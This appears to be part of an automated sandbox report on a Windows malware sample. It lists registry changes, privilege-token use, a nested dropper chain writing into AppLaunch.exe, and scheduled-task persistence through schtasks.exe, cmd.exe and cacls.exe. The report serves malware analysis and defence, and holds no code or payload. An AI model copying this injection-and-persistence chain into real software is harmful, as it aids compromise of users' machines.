Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8f141032ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = adfe2f41ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 4360 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 3836 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4016 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4940 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 4572 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4572 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4940 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 4016 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3304 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1936 wrote to memory of 196 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 4360 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 196 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe C:\Windows\System32\cmd.exe
PID 4200 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe C:\Windows\System32\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 4860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1476 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe

"C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

